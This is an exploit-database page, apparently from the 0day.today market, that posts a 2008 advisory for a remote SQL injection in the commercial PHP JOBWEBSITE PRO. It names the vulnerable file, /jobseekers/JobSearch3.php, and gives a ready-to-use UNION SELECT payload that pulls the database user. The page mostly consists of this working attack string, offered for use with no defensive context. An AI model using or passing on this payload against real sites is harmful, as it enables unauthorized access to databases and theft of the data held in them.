[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3175
Category
web applications
Date add
12-06-2008
Platform
unsorted
===============================================================
PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability
===============================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: PHP JOBWEBSITE PRO (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch3.php

[~] /jobseekers/JobSearch3.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,5,user(),7,8,9,0,1,2,3,4,5/*



#  0day.today [2024-11-15]  #